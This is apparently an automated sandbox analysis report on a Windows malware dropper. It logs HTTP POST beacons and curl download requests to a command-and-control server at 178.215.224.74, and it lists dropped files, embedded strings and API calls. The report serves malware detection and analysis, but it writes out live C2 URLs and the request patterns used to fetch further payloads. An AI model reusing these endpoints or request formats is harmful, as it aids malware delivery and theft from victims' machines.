    Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 49 33 4b 44 6b 79 4d 69 70 4c 4f 46 35 64 63 32 64 77 63 56 35 6a 62 6d 5a 74 5a 6e 74 65 51 33 42 79 52 47 46 30 59 56 78 53 62 57 6c 76 61 57 35 6e 58 6b 5a 76 62 48 4a 6f 61 57 35 47 64 57 56 77 63 56 34 30 51 30 4d 35 4e 44 51 78 4d 54 64 42 51 55 4d 33 4d 45 51 38 51 45 56 47 4f 45 52 48 4f 7a 49 77 52 30 5a 48 4e 6a 52 66 5a 47 34 6d 4e 58 68 62 51 6c 30 78 4d 44 41 71 4d 54 49 34 4d 7a 45 71 4d 54 55 36 4c 6a 49 7a 4e 53 34 79 4d 44 51 6d 4e 7a 5a 5a 51 46 30 7a 4d 6a 41 6f 4d 7a 41 77 4b 45 45 36 58 46 56 78 62 58 42 7a 58 47 6c 75 5a 47 64 75 63 56 35 44 63 6e 4a 47 59 58 5a 70 56 46 42 74 59 57 39 70 62 6d 64 63 52 47 39 75 65 47 70 70 62 6b 52 33 62 33 42 7a 58 6a 52 44 51 54 73 32 50 6a 4d 7a 4e 30 4e 44 51 54 63 79 52 44 5a 43 52 30 51 79 52 6b 55 7a 4d 44 70 48 52 45 55 38 4e 43 78 34 62 6d 56 5a 51 6c 38 7a 4d 6a 41 6f 4f 54 67 79 4d 7a 45 6f 4d 54 63 34 4c 6a 49 78 4e 79 59 77 4d 6a 51 75 4e 54 5a 62 51 46 38 25 33 44
    Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTI3KDkyMipLOF5dc2dwcV5jbmZtZnteQ3ByRGF0YVxSbWlvaW5nXkZvbHJoaW5GdWVwcV40Q0M5NDQxMTdBQUM3MEQ8QEVGOERHOzIwR0ZHNjRfZG4mNXhbQl0xMDAqMTI4MzEqMTU6LjIzNS4yMDQmNzZZQF0zMjAoMzAwKEE6XFVxbXBzXGluZGducV5DcnJGYXZpVFBtYW9pbmdcRG9ueGppbkR3b3BzXjRDQTs2PjMzN0NDQTcyRDZCR0QyRkUzMDpHREU8NCx4bmVZQl8zMjAoOTgyMzEoMTc4LjIxNyYwMjQuNTZbQF8%3D
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php HTTP/1.1
    Accept: text/*
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 111
    Cache-Control: no-cache
    Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 7a 4b 44 6b 79 4d 6a 45 25 32 46 4b 46 6c 49 58 54 4d 79 4d 69 67 7a 4d 6a 41 7a 4f 53 49 7a 4e 54 67 73 4d 6a 45 31 4c 6a 49 79 4e 69 59 31 4e 46 74 41 58 77 25 33 44 25 33 44
    Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAzKDkyMjE%2FKFlIXTMyMigzMjAzOSIzNTgsMjE1LjIyNiY1NFtAXw%3D%3D
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php HTTP/1.1
    Accept: text/*
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 111
    Cache-Control: no-cache
    Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 7a 4b 44 6b 79 4d 6a 45 25 32 46 4b 46 6c 49 58 54 4d 79 4d 69 67 7a 4d 6a 41 7a 4f 53 49 7a 4e 54 67 73 4d 6a 45 31 4c 6a 49 79 4e 69 59 31 4e 46 74 41 58 77 25 33 44 25 33 44
    Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAzKDkyMjE%2FKFlIXTMyMigzMjAzOSIzNTgsMjE1LjIyNiY1NFtAXw%3D%3D
Source: global traffic HTTP traffic detected:
    POST /v10/ukyh.php HTTP/1.1
    Accept: text/*
    Content-Type: application/x-www-form-urlencoded; charset=utf-8
    User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5
    Host: 178.215.224.74
    Content-Length: 111
    Cache-Control: no-cache
    Data Raw: 6a 73 70 6f 3d 33 34 26 6a 77 76 73 3d 34 43 41 39 36 36 33 31 35 43 43 43 37 30 46 34 42 45 46 30 46 45 33 32 32 45 44 45 34 36 26 6d 65 6c 71 3d 4d 54 41 7a 4b 44 6b 79 4d 6a 45 25 32 46 4b 46 6c 49 58 54 4d 79 4d 69 67 7a 4d 6a 41 7a 4f 53 49 7a 4e 54 67 73 4d 6a 45 31 4c 6a 49 79 4e 69 59 31 4e 46 74 41 58 77 25 33 44 25 33 44
    Data Ascii: jspo=34&jwvs=4CA966315CCC70F4BEF0FE322EDE46&melq=MTAzKDkyMjE%2FKFlIXTMyMigzMjAzOSIzNTgsMjE1LjIyNiY1NFtAXw%3D%3D
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.252
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: unknown TCP traffic detected without corresponding DNS query: 178.215.224.74
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.252User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=5 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=6 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=31 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=7 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=10&melq=1 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?gi HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=33&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=3&jwvs=4CA966315CCC70F4BEF0FE322EDE46&vprl=2 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=1&jwvs=4CA966315CCC70F4BEF0FE322EDE46&zjyp=true&yuvc=false&nzrj=00000&sftb=true HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=35&xvgj=cXl1cC56aXA%3D HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=8 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=2021&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=3002&melq=d460800e784d2ac37a5620f6b348df6f*6&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=2016&jwvs=4CA966315CCC70F4BEF0FE322EDE46&bsxa=1 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=3002&melq=79019141f392e1d4f8c60697fd9f5a0e*2&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic HTTP traffic detected: GET /v10/ukyh.php?jspo=2022&jwvs=4CA966315CCC70F4BEF0FE322EDE46 HTTP/1.1Host: 178.215.224.74User-Agent: curl/7.83.1Accept: */*
Source: global traffic DNS traffic detected: DNS query: EaUMrTLEnhJoi.EaUMrTLEnhJoi
Source: unknown HTTP traffic detected: POST /v10/ukyh.php HTTP/1.1Accept: text/*Content-Type: application/x-www-form-urlencoded; charset=utf-8User-Agent: Mozilla/5.0 (X11; U; Linux i686; it-IT; rv:1.9.0.2) Gecko/2008092313 Ubuntu/9.04 (jaunty) Firefox/3.5Host: 178.215.224.74Content-Length: 639Cache-Control: no-cache
Source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp String found in binary or memory: ftp://ftp.info-zip.org/pub/infozip
Source: curl.exe, 00000018.00000002.2549469870.0000000002829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.252/v10/ukyh
Source: curl.exe, 00000018.00000002.2549469870.0000000002829000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.252/v10/ukyh.php?jspo=6
Source: curl.exe, 0000001F.00000002.2635866333.0000000002DE9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000031.00000002.2785207887.0000000002D29000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000003A.00000002.2828321444.00000000033A9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000048.00000002.2929796324.00000000035C9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000004E.00000002.2962664358.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000051.00000002.2978809870.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000057.00000002.3058564339.0000000002E49000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000060.00000002.3114079501.0000000003019000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.
Source: curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.#
Source: curl.exe, 0000003A.00000002.2828321444.00000000033A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.%
Source: curl.exe, 00000031.00000002.2785207887.0000000002D29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.NNAME=ConsoleSh
Source: curl.exe, 00000057.00000002.3058564339.0000000002E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.c
Source: curl.exe, 00000060.00000002.3114079501.0000000003019000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?gi
Source: curl.exe, 0000004E.00000002.2962664358.0000000002A09000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=10&melq=1
Source: curl.exe, 0000003A.00000002.2828321444.00000000033A9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=31
Source: curl.exe, 00000057.00000002.3058564339.0000000002E49000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldml
Source: curl.exe, 00000028.00000002.2695353799.00000000031D9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D
Source: curl.exe, 00000031.00000002.2785207887.0000000002D29000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D
Source: curl.exe, 0000001F.00000002.2635866333.0000000002DE9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=5
Source: curl.exe, 0000002E.00000002.2734583748.0000000002BB9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000042.00000002.2875914285.0000000002EB8000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000004B.00000002.2945763230.0000000002D59000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000051.00000002.2978809870.00000000031E9000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000054.00000002.3000425346.0000000003029000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 0000005B.00000002.3090746109.0000000002E09000.00000004.00000020.00020000.00000000.sdmp, curl.exe, 00000063.00000002.3132233992.00000000034B9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6
Source: curl.exe, 00000045.00000002.2913367810.0000000003359000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=60%
Source: curl.exe, 00000037.00000002.2811327760.0000000003349000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6Q
Source: curl.exe, 00000051.00000002.2978809870.00000000031E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6T
Source: curl.exe, 00000022.00000002.2651944321.0000000002AF9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6c
Source: curl.exe, 00000042.00000002.2875914285.0000000002EB8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=6h
Source: curl.exe, 00000048.00000002.2929796324.00000000035C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=7
Source: curl.exe, 00000048.00000002.2929796324.00000000035C9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://178.215.224.74/v10/ukyh.php?jspo=7wk0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.dr String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.dr String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.dr String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.dr String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: RevenueDevices.exe.10.dr String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0A
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://ocsp.digicert.com0X
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.dr String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.dr String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.dr String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Rocky.0.dr, InnoSphere.scr.10.dr, Finish.com.1.dr String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, Finish.com, 0000000A.00000000.2072323942.0000000000625000.00000002.00000001.01000000.00000007.sdmp, InnoSphere.scr, 00000010.00000000.2231353404.0000000000F05000.00000002.00000001.01000000.00000009.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: file.exe, RevenueDevices.exe.10.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, zip.exe.52.dr String found in binary or memory: http://www.info-zip.org/
Source: azvw.exe, 00000034.00000002.2795490555.0000000000428000.00000004.00000001.01000000.0000000A.sdmp, zip.exe.52.dr, azvw.exe.10.dr String found in binary or memory: http://www.info-zip.org/zip-bug.html;
Source: PsInfo.exe.52.dr, PsInfo64.exe.52.dr String found in binary or memory: http://www.sysinternals.com
Source: Finish.com, 0000000A.00000003.2079124293.0000000003B76000.00000004.00000800.00020000.00000000.sdmp, RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Rocky.0.dr, InnoSphere.scr.10.dr, Disco.88.dr, Finish.com.1.dr String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Finish.com.1.dr String found in binary or memory: https://www.globalsign.com/repository/0
Source: RevenueDevices.exe, 00000058.00000003.3077179434.0000000002AB5000.00000004.00000020.00020000.00000000.sdmp, Either.pif.92.dr, Disco.88.dr String found in binary or memory: https://www.globalsign.com/repository/06
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard, 0_2_004050F9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW, 0_2_004044D1

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Los entropy: 7.99768365381
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Become entropy: 7.99784070507
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Howard entropy: 7.99757648221
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Vermont entropy: 7.99725611197
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Bt entropy: 7.99648411738
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Vatican entropy: 7.9972950771
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Temp\Mental entropy: 7.99804736681
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\768032\G entropy: 7.99966998402
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com File created: C:\Users\user\AppData\Local\InnoSphere Dynamics\l entropy: 7.99966998402
